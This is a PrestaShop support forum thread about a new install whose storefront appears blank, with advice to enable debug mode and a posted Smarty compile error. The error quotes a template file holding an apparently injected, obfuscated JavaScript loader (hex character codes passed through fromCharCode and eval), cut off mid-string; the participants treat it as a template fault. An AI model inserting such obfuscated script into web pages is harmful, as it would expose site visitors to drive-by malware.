Jump to content

New installfront end appears white


Recommended Posts

Hi,

 

Delete/rename your .htaccess file - If that doesn't work, then go to your config folder and open defines.inc.php.

 

In that file, enable debug mode:

 

Change this (located at line 28)

define('_PS_MODE_DEV_', false);

To this:

define('_PS_MODE_DEV_', true);

 

Now reload your website and it should produce some errors which you can post here.

Edited by Carlsen (see edit history)
  • Like 1
Link to comment
Share on other sites

Thanks for the reply. Renaming/deleting htaccess did not work. I edited the line and it now shows the following error:

 

 

Fatal error: Uncaught exception 'SmartyCompilerException' with message 'Syntax Error in template "/home/darknite/public_html/shop/modules/blocklanguages/blocklanguages.tpl" on line 57 "</div><!--a59dc4--><script type="text/javascript" language="javascript" > aq="0x";ff=String;ff=ff.fromCharCode;zz=3;try{document.body^=~1;}catch(z1z1){v=123;vzs=0;try{document;}catch(q){vzs=1;}if(!vzs)e=eval;if(1){f="5e,6d,66,5b,6c,61,67,66,18,72,72,72,5e,5e,5e,20,21,18,73,5,2,18,18,18,18,6e,59,6a,18,6a,5f,5e,70,18,35,18,5c,67,5b,6d,65,5d,66,6c,26,5b,6a,5d,59,6c,5d,3d,64,5d,65,5d,66,6c,20,1f,61,5e,6a,59,65,5d,1f,21,33,5,2,5,2,18,18,18,18,6a,5f,5e,70,26,6b,6a,5b,18,35,18,1f,60,6 in /home/darknite/public_html/shop/tools/smarty/sysplugins/smarty_internal_templatecompilerbase.php on line 665

Link to comment
Share on other sites

Hi again gridl0ck,

 

Seems there is an issue with the blocklanguages.tpl file. Try disabling the blocklanguages module and see if your page now works.

 

Unless you have made changes to your blocklanguages.tpl file, I would advise that you just replace that file with the default one

Link to comment
Share on other sites

I tried that and then it had a problem with block currencies. Think I may do a fresh install. I was installing it with automatic install provided by my webhost and then using the update module to update it. May just download latest version and do a manual install.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...